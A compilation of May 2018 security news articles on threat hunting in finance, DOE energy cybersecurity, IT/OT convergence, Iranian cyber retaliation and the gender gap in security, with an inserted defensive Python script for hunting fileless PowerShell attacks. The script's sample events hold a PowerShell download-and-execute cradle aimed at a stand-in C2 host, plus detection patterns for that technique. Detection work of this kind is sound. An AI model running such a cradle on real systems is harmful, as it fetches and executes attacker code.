This NIST study is specifically about facial recognition -- but the basic principles are likely to be similar across all uses of machine learning in biometrics and cybersecurity. "First, the machine learning algorithm gathers facts about a situation through inputs and then compares this information to stored data and decides what the information signifies," explains Dr. Kevin Curran, senior IEEE member and professor of cybersecurity at Ulster University. "The computer runs through various possible actions and predicts which action will be most successful based on the collected information.

"AI is therefore increasingly playing a significant role in cybersecurity, especially as more challenges appear with authenticating users. However, these AI techniques must be adaptive and self-learning in complex and challenging scenarios where people have parts of their face obscured or the lighting is quite poor to preserve accuracy and a low false acceptance rate."

He cites the use of AI in Apple's Face ID. "Face ID works by projecting around 30,000 infrared dots on a face to produce a 3D mesh. This resultant facial recognition information is stored locally in a secure enclave on the new Apple A11 Bionic chip. The infra-red sensor on front is crucial for sensing depth. Earlier facial recognition features e.g. Samsung last year, were too easily fooled by face masks and 2D photos. Apple claim their Face ID will not succumb to these methods. However, some claim already that 3D printing someone's head may fool it, but we have yet to see that hack tested."

This NIST study was solely about the efficacy of facial recognition algorithms, and the results cannot be automatically applied to other machine learning algorithms. Nevertheless, the general conclusions are likely to apply across many other uses for AI in both physical security and cybersecurity. AI is improving rapidly. It cannot yet replace human expertise completely, but it is most effective when used by, or in conjunction with, a single human expert. The implication is very clear: the correct combination of man and machine already has the potential to both improve performance and reduce payroll costs.


Attackers Hide in Plain Sight as Threat Hunting Lags: Report
23.5.2018 securityweek Cyber

CISO Survey Shows the Importance of Threat Hunting in the Finance Sector

The finance sector has one of the most robust cybersecurity postures in industry. It is heavily regulated, frequently attacked, and well-resourced -- but not immune to cybercriminals. Ninety percent of financial institutions were targeted by ransomware alone in the past 12 months.

Endpoint protection firm Carbon Black surveyed the CISOs of 40 major financial institutions during April 2018 to understand how the finance sector is attacked and what concerns its defenders. Two things most stand out: nearly half (44%) of financial institutions are concerned about the security posture of their technology service providers (TSPs -- the supply chain); and despite their resources, only 37% have established threat hunting teams.

Concern over the supply chain is not surprising. Cybercriminals are increasingly attacking third-parties (who may be less well-protected or have their own security issues) to gain access to the primary target. The Federal Deposit Insurance Corporation (FDIC) is also concerned about the supply chain, and has developed an examination process that includes reviewing public information about the TSPs and their software.

One of the areas that concerns the FDIC is consolidation within the service provider industry. "For example," it notes, "a flawed acquisition strategy may weaken the financial condition of the acquirer, or a poorly planned integration could heighten operational or security risk."

Carbon Black recommends that this potential risk be countered by hunt teams and defenders closely assessing their TSP security posture. But, it adds, "Given that 63% of financial institutions have yet to establish threat hunting teams, there should be concern regarding limited visibility into exposure created by TSPs."

But it also considers threat hunting to be important in detecting direct attacks. There are two primary reasons. The first is the increasing tendency for attackers to use fileless attacks that are not easily detected by standard technology; and the second is a growing willingness for attackers to engage in counter-countermeasures; that is, to counter the defender's incident response.

Fileless attacks are increasing across all industry sectors. A typical attack might involve a Flash vulnerability. Flash invokes PowerShell, feeding instructions via the command line. PowerShell then connects to a stealth C&C server, from where it downloads a more extensive PowerShell script that performs the attack. All of this is done in memory -- no malware file is downloaded and there is nothing for traditional technology defenses to detect.
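A hunt for the chain described above (a Flash-rendering process spawning PowerShell that is fed instructions on the command line and pulls a script from the network) can be run over process-creation telemetry. The following is an added example, not code from the article or from Carbon Black; it assumes Sysmon-style fields (`Image`, `ParentImage`, `CommandLine`, `ProcessId`), and the host list, weights, threshold and sample events are constructed for illustration.

```python
import base64
import ntpath
import re

POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Assumed list of processes that can render Flash content; tune to your estate.
FLASH_HOSTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "winword.exe", "excel.exe"}
FLASH_PREFIXES = ("flashplayerplugin", "flashutil")

DOWNLOAD = re.compile(r"net\.webclient|downloadstring|downloaddata|invoke-webrequest", re.I)
IN_MEMORY = re.compile(r"\biex\b|invoke-expression", re.I)


def _flags(cmdline):
    """Yield (flag_name, following_token) pairs from a PowerShell command line."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] in "-/" and len(tok) > 1:
            yield tok[1:].lower(), tokens[i + 1]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    for name, value in _flags(cmdline):
        # PowerShell accepts any unambiguous prefix (-e, -enc, ...) and the alias -ec.
        if "encodedcommand".startswith(name) or name == "ec":
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except ValueError:
                return None
    return None


def score_event(event):
    """Score one process-creation event against the Flash -> PowerShell chain."""
    result = {"pid": event["ProcessId"], "score": 0, "reasons": []}
    if ntpath.basename(event["Image"]).lower() not in POWERSHELL:
        return result
    parent = ntpath.basename(event["ParentImage"]).lower()
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    # Inspect both the visible command line and anything hidden behind base64.
    text = cmdline + " " + (decoded or "")

    def hit(points, reason):
        result["score"] += points
        result["reasons"].append(reason)

    if parent in FLASH_HOSTS or parent.startswith(FLASH_PREFIXES):
        hit(2, "PowerShell spawned by a process that renders Flash content: " + parent)
    if decoded is not None:
        hit(1, "instructions passed as an encoded command")
    if DOWNLOAD.search(text):
        hit(1, "script fetched from the network")
    if IN_MEMORY.search(text):
        hit(1, "fetched content executed in memory")
    if any("windowstyle".startswith(n) and v.strip("\"'").lower() == "hidden"
           for n, v in _flags(cmdline)):
        hit(1, "window hidden from the user")
    return result


def hunt(events, threshold=3):
    """Return scored events at or above the threshold, highest score first."""
    scored = (score_event(e) for e in events)
    return sorted((s for s in scored if s["score"] >= threshold),
                  key=lambda s: s["score"], reverse=True)


def _enc(script):
    """Build an -EncodedCommand value the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events; hosts use the reserved .invalid TLD.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -NoP -W Hidden -Command "' + _CRADLE + '"'},
    {"ProcessId": 2284, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"ProcessId": 5312, "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc " + _enc(_CRADLE)},
    {"ProcessId": 6001, "ParentImage": r"C:\Program Files\Google\Chrome\chrome.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"ProcessId": 712, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Ops\deploy.ps1"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["pid"], finding["score"], "; ".join(finding["reasons"]))
```

Because nothing is written to disk in this chain, the parent/child relationship and the command line are the only artefacts available, which is why command-line logging has to be enabled on endpoints before a hunt like this returns anything.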

"Active threat hunting," says Carbon Black, "puts defenders 'on the offensive' rather than simply reacting to the deluge of daily alerts." It "aims to find abnormal activity on servers and endpoints that may be signs of compromise, intrusion or exfiltration of data. Though the concept of threat hunting isn't new, for many organizations the very idea of threat hunting is."

But the need for threat hunting goes beyond simple detection of intrusion. "Attackers are able to go off their scripts while defenders are sticking to manual and automated playbooks," warns Carbon Black. "These playbooks are generally based off simple indicators of compromise (IoCs). As a result, security teams are often left thinking they have disrupted the attacker but, with counter incident response, attackers maintain the upper hand."

Compounding this, attackers are beginning to incorporate a secondary command and control in case one is discovered or disrupted. Carbon Black notes that this tactic has already been found in 10% of victims, and predicts it is a tactic that will grow in future months. The principle is that an attacker's ability to improvise and change directions at speed is best countered by a human defender rather than simply a pre-programmed set of incident response steps.

"Financial institutions," suggests Carbon Black, "should aim to improve situational awareness and visibility into the more advanced attacker movements post breach. This must be accompanied with a tactical paradigm shift from prevention to detection. The increasing attack surface, coupled with the utilization of advanced tactics, has allowed attackers to become invisible. Decreasing dwell time is the true return on investment for any cybersecurity program."

In reality, of course, this does not just apply to the finance sector. The same evolving methodology is being used by attackers across all industry sectors. The need for threat hunting is not limited to finance. "All sectors should take heed," Carbon Black chief cybersecurity officer Tom Kellerman told SecurityWeek. "Generally speaking, financial services tend to be the most secure as they've come under attack with high-profile attack campaigns in recent years." The implication is that if the finance sector is slow to switch to active threat hunting, other sectors will be slower.

In April 2018, Carbon Black filed an S-1 registration statement with the U.S. Securities and Exchange Commission (SEC) for a proposed initial public offering (IPO) of its common stock. Shares of the company (NASDAQ: CBLK) jumped 26% on its first day of trading on May 4. The company has a market capitalization of nearly $1.6 billion at the time of publishing. The company emerged in its current form after its purchase by Bit9 in February 2014.


U.S. Energy Department Unveils Multiyear Cybersecurity Plan
18.5.2018 securityweek  Cyber

The U.S. Department of Energy this week announced its strategy to reduce cyber risks in the energy sector and outlined its goals, objectives and activities for the next five years.

With the energy sector increasingly targeted by threat actors, the Energy Department is concerned that attackers may be able to cause a large and prolonged energy disruption. In an effort to improve the cybersecurity and resilience of energy services, the agency has created the DOE Multiyear Plan for Energy Sector Cybersecurity, which is meant to provide a foundation for the recently launched Office of Cybersecurity, Energy Security, and Emergency Response (CESER).

The plan focuses on three main goals: strengthening cybersecurity preparedness, coordinating incident response and recovery, and accelerating research, development and demonstration (RD&D) for resilient energy delivery systems (EDS).

When it comes to strengthening preparedness, the DOE’s objectives include enhancing information sharing and situational awareness capabilities, strengthening risk management capabilities, reducing supply chain vulnerabilities, and developing and improving information sharing tools. This last objective includes the development of a virtual crowdsourced malware forensic analysis platform.

As for incident response and recovery, the Energy Department wants to establish a coordinated national incident response capability, conduct training for emergency responders and improve the incident reporting process, and conduct exercises.

The DOE’s third goal is to accelerate “game-changing RD&D” of resilient EDS, including for detecting, preventing and mitigating cyber incidents. The organization also wants tools and technologies that can anticipate future attack scenarios, and the development of systems and components that are cybersecurity-aware and capable of automatically handling cyberattacks.

“The DOE will be updating the Cybersecurity Capability Maturity Model (C2M2). The market has changed since it was published in February 2014,” commented Michael Magrath, director of global regulations & standards at VASCO Data Security. “We anticipate DOE will incorporate NIST’s Digital Identity Guidelines (SP 800-63-3), refreshed in 2017 and advance risk-based, biometric adaptive authentication technologies to protect the nation’s energy sector.”

“We welcome the DOE raising awareness around critical threats to the energy sector and laying out a strategy,” said Ray DeMeo, COO at Virsec. “While the strategy pillars are sound, making them actionable will be challenging - largely in view of the inertia behind legacy systems. It's critical that we invest with speed and agility, and the roadmap’s goal to accelerate game-changing RD&D of resilient systems stands out. The administration’s funding request for $96 million is hopefully just a down payment, because protecting our infrastructure adequately will cost billions.”


Security Gaps Remain as OT, IT Converge
16.5.2018 securityweek  Cyber

The accelerating digitization of business, driven by compelling commercial arguments, is driving the integration of new information technology (IT) networks with older operational technology (OT) networks. This is introducing new security risks to old technology and old technology practices -- and where the OT is driving a critical manufacturing plant, the new risk is from nation-state actors as well as traditional cyber criminals.

The good news is that many organizations understand the risks and are actively engaged in mitigating those risks. The bad news is the risk mitigation process is far from complete.

Network and content security firm Fortinet commissioned Forrester Consulting to survey the state of converging IT / OT network security. In an associated blog, Fortinet's senior director of product marketing, Peter Newton, explains the cultural difference between IT and OT security: "IT teams have a tendency to just want to throw security technology at the network and call it good. But these networks can be very different, and what works well in one environment can have devastating consequences in the other. For example, an error that opens a port on a switch can have a very different result from one that opens a valve on a boiler."

In January 2018, Forrester queried 429 global decision-makers responsible for the security of their organization’s critical infrastructure from a range of different industries, asking about their IT / OT convergence (PDF) and the security challenges being faced. The result suggests that awareness is high, and steps are in progress (SCADA / ICS security spending is planned to increase by 77%) -- but there is much yet to be done (45% of respondents do not use privileged account management (PAM) for their administrators).

The last issue is particularly relevant given the extent to which converged networks are being opened to third-party suppliers. Sixty-four percent of the companies surveyed provide either complete or high-level access to their SCADA / ICS, including to outsourced suppliers, business partners and government agencies. This seems to be changing, with respondents taking steps to reduce the number of vendors used to provide security functions for IPS, NAC and IoT.

"The number of organizations that now rely on a single vendor to provide a full range of outsourced solutions has jumped from 38% to 47% between 2016 and 2018," comments John Maddison, Fortinet's SVP products and solutions, in a separate blog post.

Coupled with the lack of a PAM solution, the report highlights that 45% of the respondents do not use role-based access control, which provides openings for insider threats. Indeed, internal hackers are considered a greater threat (77% of respondents are extremely or very concerned) than external hackers (70%). The greatest concern is reserved for malware at 77%, with leakage of sensitive or confidential data at 70%.

The security threat is not hypothetical. While there have already been several highly-publicized incidents (such as the Ukraine power outages in December 2015, and the U.S. water utility incident in March 2016) the majority of respondents have also experienced a breach. Fifty-six percent of organizations using SCADA / ICS reported a breach in the past year, and only 11% indicated they have never been breached.

SCADA / ICS breaches can have serious consequences. "Sixty-three percent of organizations say the safety of their employees was highly or critically impacted by a SCADA / ICS security breach," notes the report. "Another 58% report major impacts to their organization’s financial stability, and 63% note a serious drag on their ability to operate at a sufficient level."

Solutions to the growing SCADA / ICS risk exist, but require a new approach beyond the traditional IT security approach. IT and OT teams speak different languages for security, comments Newton. Existing OT systems may be running on an obsolete operating system on hardware that is ten or more years old. "But that may be because it only has one job," he explains: "for example, monitoring a thermostat and then throwing a switch when it reaches a critical temperature. That doesn’t require the latest technology, and if it is doing the job it was designed to do, then there is no reason to change it. But because so many of these systems run on proprietary software and use delicate instrumentation, even something as benign as scanning a device for malware can cause it to malfunction."

Solutions do exist, but must be chosen with care. "When considering a security vendor for their SCADA / ICS environments," suggests Newton, "the ability to meet compliance standards and provide end-to-end solutions, along with a reputation for reliability are the most important attributes [the respondents] look for. These organizations are looking for solutions from a variety of vendors, from systems integrators to security manufacturers."


Industry Reactions to Iran Cyber Retaliation Over U.S. Nuclear Deal Exit
10.5.2018 securityweek Cyber

President Donald Trump announced this week that the U.S. is withdrawing from the Iran nuclear deal and reimposing sanctions on the Middle Eastern country. Many experts fear that Iran will retaliate by launching cyberattacks on Western organizations.

Industry professionals contacted by SecurityWeek all say that there is a strong possibility of attacks, but they mostly agree that Iran will likely not try to cause too much damage as that could lead to massive response from the United States and its allies.

And the feedback begins...

Ross Rustici, senior director, intelligence services, Cybereason:

“Iran is currently in a precarious position; any disproportionate retaliation risks alienating the European community that is currently aligned with continued sanctions relief in exchange for IAEA inspections. Compounding that with the fact that Iran's domestic situation has degraded over the last several years as a result of its intervention in the broader Middle East and its proxy war with Saudi Arabia, leaves Iran's leadership needing to be very careful with how directly it confronts the United States on this issue.

In the near term Iran is most likely going to take a wait and see approach to the decertification of the deal by Trump. If sanctions are imposed on Iran and it serves to cause significant economic harm through rigorous enforcement, then Iran will probably seek to retaliate in a fashion similar to what the US experienced in 2013 with the DDoS attacks against the financial sector. Despite the Iranian cyber program maturing significantly in the past five years, they will focus on a proportional response to whatever sanctions regime is levied against them. Disruptions that cause financial loss rather than destruction is where the regime is likely to go first. Iran is only likely to use significant destructive capabilities if the situation escalates or the US expands its role in supporting Saudi Arabia.

Given Iran's growth over the last five years in the cyber domain, I would expect them to at least be initially successful against civilian targets in the US should they decide to go that route. From a technical perspective they have more than enough capability to carry out successful attacks, as we have seen in the Middle East and the United States. If private sector networks are left to their own defences, Iran will have a high success rate. The thing that will reduce their operational capacity is if the US government takes a proactive and aggressive counter cyber posture and actively disrupts Iran's program before an attack is launched. While this would greatly hamper Iran's efforts it would not eliminate them completely and it would also be an escalation that could result in Iran taking more destructive measures because they have less options and control.”

Priscilla Moriuchi, Director of Strategic Threat Development, Recorded Future:

“President Trump’s actions have placed American businesses at increased risk for retaliatory and destructive cyber attacks by the Islamic Republic. We assess that within months, if not sooner, American companies in the financial, critical infrastructure, oil, and energy sectors will likely face aggressive and destructive cyber attacks by Iranian state-sponsored actors.

Further, our research indicates that because of the need for a quick response, the Islamic Republic may utilise contractors that are less politically and ideologically reliable (and trusted) and as a result, could be more difficult to control. It is possible that this dynamic could limit the ability of the government to control the scope and scale of these destructive attacks once they are unleashed.”

Phil Neray, VP of Industrial Cybersecurity, CyberX:

“Cyber is an ideal mechanism for weaker adversaries like Iran because it allows them to demonstrate strength on the global stage without resorting to armed conflict. I expect that Iran will continue to escalate its cyberattacks on US targets but will keep them below the threshold that would require a kinetic response from the US.

TRITON shows that Iran has the skills to launch damaging attacks on critical infrastructure. However, for now they confine these attacks to Middle Eastern targets in the same way that Russia has so far only shut down the power grid in the Ukraine. We should expect Iran to conduct phishing and cyber espionage attacks against US-based industrial and critical infrastructure firms -- as we've seen with Russian threat actors -- with the goal of establishing footholds in OT networks that could later be used for more destructive attacks.”

Gen. Earl Matthews, senior vice president and chief strategy officer, Verodin:

“The Iranians continue to improve and have become more sophisticated with their cyber capabilities. In my opinion, they are in the top 5 of countries with significant capabilities. We will definitely see increased cyber activity as a result of the US backing out of the nuclear agreement. Attacks not only against the US but many of our allies, especially Israel.

Iran has previously attacked our financial institutions with Denial of Service and most recently penetrated a number of universities. The latest attacks represented the continued loss of intellectual property of our nation. It wouldn’t surprise me if many of these universities were specifically targeted because they are doing research and development on behalf of the US Government.

Iran most certainly has the capability of launching significant attacks but I would view that probability to be low. They will continue to pursue softer targets where common means of access will be through social engineering and penetrate organizations with weak cyber hygiene. These attacks can be mitigated if organizations continuously automated and measured the validity, value, and effectiveness of their cybersecurity controls. We are well beyond the checklist compliance and thinking we are safe.”

John Hultquist, Director of Intelligence Analysis, FireEye:

“Iranian actors remain among the most aggressive we track, carrying out destructive and disruptive attacks in addition to stealthier acts of cyber espionage. Prior to the nuclear agreement, Iranian actors carried out several attacks against the West. There were also clear signs these actors were probing Western critical infrastructure in multiple industries for future attack. These efforts did not entirely disappear with the agreement, but they did refocus on Iran’s neighbors in the Middle East. With the dissolution of the agreement, we anticipate that Iranian cyberattacks will once again threaten Western critical infrastructure.”

Sherban Naum, senior vice president for corporate strategy and technology, Bromium:

“The premise that Iran can or will increase their attacks is predicated on both their existing computer network attack practices and risk tolerance to potential retaliation. The regime may see a need to show strength internally and take action. They will have to balance the time and resources dedicated to increase offensive efforts with the need to shore up defensive efforts due to the increased conflicts in the region from regional actors as well as a potential retaliation by those that they attack.

[...]

There are three possible areas they could focus: Critical infrastructure, a doxxon like attack looking to shame those involved with the reversal decision and the third being in region actors and their weapons systems.

[...]

The questions to ask are what would motivate their taking action and their acceptable outcomes. Taking action, putting lives at risk could result in a kinetic response from the US and/or its allies as well as put into question Europe’s current support of the agreement. If they were to take out a power station and a hospital loses power, they lose the PR war and retaliation from the US is quite plausible. At this point, they want to show the world they are going to continue down the path of adhering to the nuclear agreement, that they are the ones targeted and have so much to lose. They would be better off influencing Europe to play into their hands as it could suit their economic needs and try to influence their own social media movement.”

Robert Lee, CEO, Dragos:

“ICS cyber attacks and espionage can be highly geopolitical in nature. Every time we see increased tension between states we expect to see a rise in ICS targeting, this does not mean we expect to see attacks. In this case, activity moves beyond conducting early reconnaissance to gaining access to infrastructure companies and stealing information that could be used at a later date. However simply having access to the information does not mean an attack is easy or imminent. Avoiding such tension while also defending against such aggressive efforts is the goal.”

Sanjay Beri, CEO & Founder of Netskope:

“While the repercussions of the United States pulling out of the Iran nuclear deal will be wide reaching, one of the first places you can expect to see a response is cyberspace. Nation-states, including Iran, have historically used cyberattacks as a low-risk, high-reward tactic for retaliating to political opposition. We saw this with North Korea in the form of the Sony hack, and Iran’s attack against US banks following Stuxnet.

The U.S. needs cybersecurity leadership today more than ever if we are to stand a chance at defending the country from nation-state sponsored cyber attacks. Forming a cohesive cyber defense strategy has become nearly impossible as hundreds of departments report into a siloed set of decision makers. There’s no silver bullet, but appointing a federal CISO to oversee all of our nation’s cybersecurity initiatives and promote inter-agency collaboration would be a big step in the right direction.”

Willy Leichter, Vice President of Marketing, Virsec:

“It seems likely that a deteriorating relationship between the US and Iran will lead to more cyberattacks. There have been numerous reports about state-sponsored hacking groups in Iran including APT33 that have already targeted critical infrastructure in Saudi Arabia, South Korea, and the US. These hacking groups have access to advanced tools (many leaked from the NSA through the Shadow Brokers) to launch attacks that corrupt legitimate processes and memory, and have proved adept at creating multiple variants of these exploits. We need to expect ongoing cyber warfare to be the new normal, and it’s critical that all organizations take security much more seriously, improve their detection and protection capabilities, and train all employees to protect their credentials against theft.”

Andrew Lloyd, President, Corero Network Security:

“Given multiple reports implicating the Iranian government in the cyber-attack on the Saudi petrochemical plant, the prospect of cyber-retribution for the US withdrawal certainly exists. Also, it’s well worth remembering that even if a nation doesn't have well developed cyberwarfare resources, there’s plenty of bad actors on the global stage who are more than happy to launch attacks against the foes of anyone who’s willing to pay. Moreover, the irony is that such bad actors are able to leverage the exploits that major forces such as the US government have themselves developed and which subsequently leaked across the Dark Web’s darker commercial corners. For example, it’s well reported that groups such as the Shadow Brokers have released and brokered tools from the NSA.

Also, basic and advanced DDoS-for-hire services abound, as we’ve seen in recent weeks and months. This all underscores the fact that all operators of essential services (and especially, critical national infrastructure) must up their game when it comes to DDoS defences. Ironically, today is the day that the EU NIS Directive becomes law in all 28 EU Member States.”


Is The Education System Keeping Women Out of Cybersecurity?
10.5.2018 securityweek Cyber

While the Gender Bias in Professions Remains Strong, There Are Indications That Factors Beyond Genuine Aptitude Are at Play

Despite the increasing cybersecurity skills shortage, projected by Frost & Sullivan to reach 1.8 million unfilled roles by 2020, we are yet to engage with the obvious solution. There is currently more interest in reducing vacancies using artificial intelligence (AI) and automation than in training youngsters to adopt the profession.

The problem with AI as a solution, according to a report published Tuesday by ProtectWise, is, "The impact of artificial intelligence on the man-hours required to staff a security operations center is basically nil today -- and will be for a significant amount of time."

This is confirmed by a separate survey (PDF) published Wednesday by Exabeam. Exabeam queried 481 cybersecurity professionals around the world. It found nearly 68% of respondents reported they do not currently use AI or ML in their jobs or don’t have plans to use them in the future, even though 75% agreed AI/ML can make their job better or easier and improve security.

The short-term solution to the skills gap must necessarily be to increase skills rather than the long-term reduction of demand.

Together with the skills gap is an awareness of the paucity of women in security. This is also confirmed by Exabeam's study, which found that 90% of security professionals are male.

ProtectWise returned to the data it gathered in an ESG survey last year, but specifically looked for any indication that the two problems may be linked: in short, could increasing the number of young women entering the security profession reduce the skills gap?

What it found is somewhat counterintuitive. Although the well-known gender bias in professions remains strong, there are indications that factors other than genuine aptitude are at play. In high school, twice as many men as women plan to study engineering, computer science or mathematics at college. Similarly, twice as many men as women consider IT as a future career.

At the same time, women are less confident in their aptitude for a career in cybersecurity. Forty-two percent of women profess not to know enough about the subject, compared to 35% of men, while 34% of women (compared to 25% of men) consider that they do not have the aptitude.

What is surprising, however, is that the early exposure to technology that is believed to be the springboard to first studies and then careers in IT is stronger in young women than it is in young men. As many women as men game online, and the numbers that consider themselves to be early adopters of technology are also similar.

In some cases, however, young women are actually the early adopters -- 52% of women had tried VR compared to 42% of men; and more women than men have advanced technology in their household.

One conclusion that can be drawn is that the education system is the block. Young men and women enter the system with an equal aptitude for technology in general; but fewer women than men leave it to pursue technology careers. More concerning for cybersecurity is that very few of either gender consider security as a potential career.

A primary reason is that they simply do not have the option. Sixty-nine percent of the respondents said they had never taken a cybersecurity class in school, and 65% said that their school never offered a cybersecurity course.

This lack of interest from the schools does their pupils no favors. The Exabeam study shows a median salary range of $75,000 - $100,000 per year, with 34% earning more than $100,000 per year (chief security officers can expect around $200,000 and above); while 86% of existing professionals would recommend a career as a security analyst to new graduates. Good money and job satisfaction should be strong incentives.

ProtectWise co-founder and CTO Gene Stevens believes the problem is a latency between society's needs and society's understanding of those needs. “Our society has not yet embraced cybersecurity as a civilization-defining competency, yet it is exactly central to our capacity to function in this massively technological age," he told SecurityWeek. "In foundational terms, it's an education and awareness problem."

The solution is a sustained effort to get cybersecurity into the educational syllabus. "In education," he continued, "one of the best roads is to have cybersecurity technology standards baked into state standards of expectation for all students. State boards review these on a regular basis, usually every three to five years. We should reach out to departments of education state by state to engage on this topic. As digital citizenship is currently being developed locally, we need to reach out to school counselors and partner with teachers -- reaching out to education associations to offer resource and support is easy and could be highly beneficial."

While educational restraints may be playing a part in a lacking cybersecurity workforce, Ashley Arbuckle, Cisco’s VP of Security Services, believes that inclusion will help put a stop to the perpetual scrambling for cybersecurity workers.

“No matter how you measure it, the number of unfilled cybersecurity positions is big and it’s a problem we’ve been lamenting for years,” Arbuckle wrote in a recent SecurityWeek column. “The traditional approach to address the shortage has been to encourage more individuals to pursue technical and engineering degrees. But which individuals? And if you aren’t “technical” does that mean there’s no room for you in cybersecurity? If we think more broadly about the type of talent we need and how to build even better security teams, we’ll see that the solution to the workforce gap is through inclusion.”

Arbuckle also believes there is no one definition of a cybersecurity professional and no one path to get there. “By increasing awareness of the varied skills needed and providing support to cultivate such talent, we have an opportunity to expand the pool of workers and improve security and financial performance in the process, with teams that are based on inclusion and diversity. We need to marshal all our resources to strengthen our defenses,” Arbuckle said.